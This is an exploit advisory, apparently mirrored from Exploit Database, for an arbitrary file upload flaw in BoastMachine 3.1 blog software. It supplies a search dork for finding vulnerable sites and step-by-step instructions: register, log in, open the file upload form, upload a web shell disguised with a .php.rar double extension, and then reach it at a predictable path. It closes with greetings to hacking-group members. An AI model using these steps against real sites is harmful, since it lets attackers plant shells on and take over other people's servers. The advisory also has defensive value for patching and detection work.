BoastMachine 3.1 – Arbitrary File Upload

• Exploit Database
• 114 阅读

• 作者： alnjm33
  日期： 2010-01-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11249/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability Author: alnjm33 Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar Version: 3.1 Tested on: Version 3.1 My home : Sec-war.com<http://Sec-war.com> :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ==========================================Dork========================================== ( Powered by boastMachine v3.1 ) ================================Exploit============================================= First join in the Site /Server/path/register.php After that login in the Site /Server/path/login.php After Login go to this link /Server/path/bmc/files.php?form_id=new Now upload your shell like ( Shell.php.rar ) Now you can find your shell here /Server/path/files/username_Shell.php.rar e.g http://server/hp_boastMachine/files/alnjm33_aasaa.php.rar ======================================================================================= Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members